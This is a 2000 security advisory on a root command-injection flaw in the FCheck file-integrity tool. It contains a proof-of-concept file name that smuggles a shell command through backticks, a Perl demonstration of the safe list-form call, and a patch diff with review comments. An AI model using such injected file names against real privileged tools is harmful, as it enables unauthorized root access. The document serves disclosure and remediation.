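FCheck: security vulnerability when checking file names that contain shell escape characters
Published: 2000-04-06
Updated: 2000-04-06
Affected systems:
FCheck 2.7.45
Description:
FCheck is a file integrity tool written in Perl. When FCheck is started with the -l option, it sends its results to
syslog instead of standard output.
It runs a system() call with the file name as an argument. However, if a file name contains shell
escape characters, the command that follows the escape character is executed with the privileges FCheck runs under (usually root).
If a user can create a file in the file system and that file is checked by FCheck, the user
may be able to gain root privileges.
<* Source: Matt Carothers <matt@telepath.com> *>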
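Added example, not part of the original advisory and not FCheck's code: how a file name like the one described above stays inert when the logger is invoked with an argument list instead of a shell command string. The running perl ($^X) is a hypothetical stand-in for the logger, and the scratch directory and file name are constructed.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Scratch directory, so an unwanted side effect would be easy to spot.
my $dir = tempdir(CLEANUP => 1);

# Constructed file name with shell metacharacters (backticks).
my $name = "blah`touch $dir/exploit`";
my $msg  = "WARNING: File addition: $name";

# Hypothetical stand-in for the logger: the running perl echoes each
# argument it receives on its own line, so nothing reaches syslog.
# The "--" stops perl from treating "-t" as one of its own switches.
my @logger = ($^X, '-e', 'print "$_\n" for @ARGV', '--');

# List-form pipe open, like list-form system(), executes the program
# directly: no /bin/sh runs and each list element is exactly one argument.
open(my $out, '-|', @logger, '-t', 'fcheck', $msg)
    or die "cannot run logger: $!";
chomp(my @argv = <$out>);
close($out) or die "logger exited with status $?";

# The message must arrive as one unmodified argument, and the command
# embedded in the file name must not have run.
die "argument was altered\n" unless @argv == 3 && $argv[2] eq $msg;
die "backticks were executed\n" if -e "$dir/exploit";
print "logger received: $argv[2]\n";
```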
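Test method:
WARNING
The following program (method) may be offensive in nature and is intended for security research and teaching only. Use at your own risk!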
[matt@shai-hulud /home/public]$ touch 'blah`touch exploit`'
[matt@shai-hulud /home/public]$ ls -l '/home/public/blah`touch exploit`'
-rw-r--r-- 1 matt wheel 0 Mar 3 21:17 /home/public/blah`touch exploit`
Running ./fcheck -asl as root from /usr/local/fcheck produces the following
entry in /var/log/messages:
Mar 4 03:24:22 shai-hulud fcheck: WARNING: File addition: [shai-hulud.telepath.com] /home/public/ [464662 -rw-r--r-- 0 Mar 04 03:18 2000 /home/public/blah]
We can see that the "exploit" file has been created.
-rw-r--r-- 1 root wheel 0 Mar 3 21:24 /usr/local/fcheck/exploit
Recommendation:
Matt Carothers has provided a temporary patch:
--- fcheck.orig Mon Mar 20 17:27:04 2000
+++ fcheck Fri Mar 31 18:13:38 2000
@@ -327,11 +327,11 @@
{
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
+ $warning=sprintf("\"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"",
+ $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
$B_Size, &ctime($B_Time), $B_Name, $L_Inode, &ShowPerms($L_Perms),
$L_Size, &ctime($L_Time), $L_Name);
- system($cmd);
+ system($Logger, "-t", $Me, $warning);
}
else
{
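Review bot: The escaped quotes kept at both ends of the format string in the new $warning=sprintf("\"WARNING: ...\"", ...) line are no longer consumed by a shell, because system($Logger, "-t", $Me, $warning) hands $warning to the logger as a single argument, so they will appear literally in the logged message. Drop the leading and trailing \" from the format string; the same applies to the other five hunks.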
@@ -351,11 +351,11 @@
{
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
+ $warning=sprintf("\"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"",
+ $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
$B_Size, &ctime($B_Time), $B_Name, $L_Inode, &ShowPerms($L_Perms),
$L_Size, &ctime($L_Time), $L_Name);
- system($cmd);
+ system($Logger, "-t", $Me, $warning);
}
else
{
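Review bot: The return value of system($Logger, "-t", $Me, $warning) is ignored, so if $Logger cannot be executed or exits non-zero the warning is lost without a trace. Check the result and fall back to reporting on the terminal, for example: system($Logger, "-t", $Me, $warning) == 0 or warn "$Me: logger failed: $?\n";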
@@ -380,11 +380,11 @@
{
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
+ $warning=sprintf("\"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"",
+ $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
$B_Size, &ctime($B_Time), $B_Name, $L_Inode, &ShowPerms($L_Perms),
$L_Size, &ctime($L_Time), $L_Name);
- system($cmd);
+ system($Logger, "-t", $Me, $warning);
}
else
{
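Review bot: Duplicated logging code: the sprintf format and the system() call here are line-for-line the same as in the hunks at 327, 351 and 404. Move them into one sub that takes the already formatted message and calls system($Logger, "-t", $Me, $msg), so a later fix cannot miss one of the call sites.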
@@ -404,11 +404,11 @@
{
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
+ $warning=sprintf("\"WARNING: [%s] %s [%s %s %s %s %s] Was modified to reflect the following: [%s %s %s %s %s]\"",
+ $ThisHost, $L_Name, $B_Inode, &ShowPerms($B_Perms),
$B_Size, &ctime($B_Time), $B_Name, $L_Inode, &ShowPerms($L_Perms),
$L_Size, &ctime($L_Time), $L_Name);
- system($cmd);
+ system($Logger, "-t", $Me, $warning);
}
else
{
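Review bot: Missing comment at the new system($Logger, "-t", $Me, $warning) call: nothing records that the list form is deliberate, chosen so that $L_Name and $B_Name are never parsed by a shell. A one-line comment there would keep a later edit from folding the arguments back into a single command string.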
@@ -435,9 +435,9 @@
($Inode, $Perms, $Size, $Time, $Name, $CRC) = split("!", $Live);
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: File addition: [%s] %s [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $Name, $Inode, &ShowPerms($Perms), $Size, &ctime($Time), $Name);
- system($cmd);
+ $warning=sprintf("\"WARNING: File addition: [%s] %s [%s %s %s %s %s]\"",
+ $ThisHost, $Name, $Inode, &ShowPerms($Perms), $Size, &ctime($Time), $Name);
+ system($Logger, "-t", $Me, $warning);
}
else
{
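Review bot: $Name is still copied unfiltered into the message built by the new sprintf("\"WARNING: File addition: ...") line. A file name may contain newlines or other control characters, which can break up or imitate log entries even though no command runs any more. Replace control characters in $Name (for example with "?") before formatting the message.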
@@ -456,9 +456,9 @@
($Inode, $Perms, $Size, $Time, $Name, $CRC) = split("!", $Base);
if($Logging)
{
- $cmd=sprintf("%s -t %s \"WARNING: File deletion: [%s] %s [%s %s %s %s %s]\"\n",
- $Logger, $Me, $ThisHost, $Name, $Inode, &ShowPerms($Perms), $Size, &ctime($Time), $Name);
- system($cmd);
+ $warning=sprintf("\"WARNING: File deletion: [%s] %s [%s %s %s %s %s]\"",
+ $ThisHost, $Name, $Inode, &ShowPerms($Perms), $Size, &ctime($Time), $Name);
+ system($Logger, "-t", $Me, $warning);
}
else
{
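Review bot: The context line ($Inode, $Perms, $Size, $Time, $Name, $CRC) = split("!", $Base); is left as it is, so a file name containing "!" is split across $Name and $CRC and the deletion warning logs a truncated name. Escape "!" when the record is written, or pick a separator that cannot occur in a file name, and apply the same change to the split on $Live in the previous hunk.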